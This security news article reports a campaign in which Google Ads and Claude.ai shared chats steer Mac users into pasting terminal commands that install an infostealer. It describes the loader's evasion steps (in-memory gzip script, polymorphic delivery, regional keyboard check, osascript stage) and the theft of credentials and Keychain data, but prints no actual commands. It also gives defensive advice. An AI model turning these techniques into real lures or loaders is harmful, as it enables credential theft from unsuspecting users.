Attackers abuse Claude.ai shared chats and Google Ads to push Mac malware

TL;DR:

  • Researchers have identified an active malvertising campaign abusing Google Ads and Claude.ai’s shared-chat feature to install macOS malware on users searching for “Claude mac download”.
  • Sponsored search results legitimately point to claude.ai, but inside the shared chats attackers have planted fake “Apple Support” installation guides that direct users to paste terminal commands silently downloading malware.
  • Resultsense view: this is a new class of brand-impersonation attack where the destination URL is genuine and the malicious payload lives inside the AI provider’s own user-generated content surface — exactly the kind of attack vector UK SMEs and IT teams need to start training staff against.

Berk Albayrak, a security engineer at Trendyol Group, identified the first variant of the campaign, with BleepingComputer subsequently confirming a second variant running on entirely separate infrastructure but using an identical social-engineering approach.

How the attack works

A user searches Google for “Claude mac download”. A sponsored ad shows claude.ai as the destination — and that is genuinely where the click lands. The shared chat presents itself as an official “Claude Code on Mac” installation guide, attributed to “Apple Support”, and walks the user through opening Terminal and pasting a single command. That command silently downloads and runs malware.

The base64 instructions in the shared chat retrieve an encoded shell script from attacker-controlled domains. The ‘loader.sh’ served by the second link is gzip-compressed shell instructions that run entirely in memory, leaving little obvious trace on disk. BleepingComputer observed the server delivering a uniquely obfuscated version of the payload on each request — a technique known as polymorphic delivery — making it harder for security tools to flag the download based on a known hash or signature.

Selective targeting and credential theft

The variant BleepingComputer examined begins by checking whether the machine has Russian or CIS-region keyboard input sources configured. If it does, the script exits and sends a quiet cis_blocked status ping back to the attacker. Only machines that pass this check progress to the next stage, suggesting selective targeting. Before running the second-stage payload, the script collects the victim’s external IP address, hostname, OS version and keyboard locale and sends it to the attacker for profiling.

The second-stage payload runs through osascript, macOS’s built-in scripting engine, giving the attacker remote code execution without dropping a traditional binary. The variant identified by Albayrak harvests browser credentials, cookies and macOS Keychain contents and exfiltrates them to attacker infrastructure — Albayrak attributed this to the MacSync macOS infostealer.

A new shape of malvertising

This campaign flips the usual malvertising pattern. Previous BleepingComputer reporting documented Google ads using a legitimate-looking domain but landing visitors on a lookalike phishing site. Here, the destination URL is the real one: Anthropic’s actual claude.ai domain. The malicious instructions live inside Claude’s own shared-chat feature.

Earlier in 2026, similar campaigns targeted developers searching for Homebrew. Targeting Claude reaches a much wider audience, including non-technical users who are simply curious about AI and less likely to scrutinise terminal commands.

UK SME relevance

UK SMEs typically run a higher proportion of macOS endpoints than larger enterprises and have less coverage from managed endpoint detection. Three practical mitigations apply directly: tell staff to navigate to claude.ai directly rather than via sponsored search results; treat any instruction asking them to paste a terminal command with suspicion regardless of source; and review whether endpoint protection on macOS devices is configured to flag in-memory polymorphic payloads.

Looking forward

Expect more attacks of this shape against other AI providers whose products include user-generated content shared via official domains. BleepingComputer reached out to Anthropic and Google for comment ahead of publication; the medium-term fix may need to come from how Claude.ai shared chats handle content that contains executable terminal commands.